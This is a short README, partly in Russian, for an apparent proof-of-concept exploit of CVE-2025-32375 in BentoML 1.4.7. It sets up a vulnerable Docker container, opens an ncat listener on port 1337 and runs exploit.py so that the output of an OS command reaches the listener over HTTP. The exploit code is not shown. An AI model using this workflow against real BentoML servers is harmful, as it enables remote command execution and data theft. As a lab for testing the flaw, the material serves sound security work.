
This repository includes everything needed to run a PoC exploit for CVE-2025-32375 in a Docker environment. It runs the latest vulnerable version of BentoML (1.4.7).
Запустите уязвимый контейнер:
docker compose up
Создайте слушатель (например, ncat):
ncat -klnv 1337
Запустите эксплойт:
python3 exploit.py
Если всё прошло успешно, вы должны получить HTTP-запрос в окне ncat с содержимым команды ОС (по умолчанию id).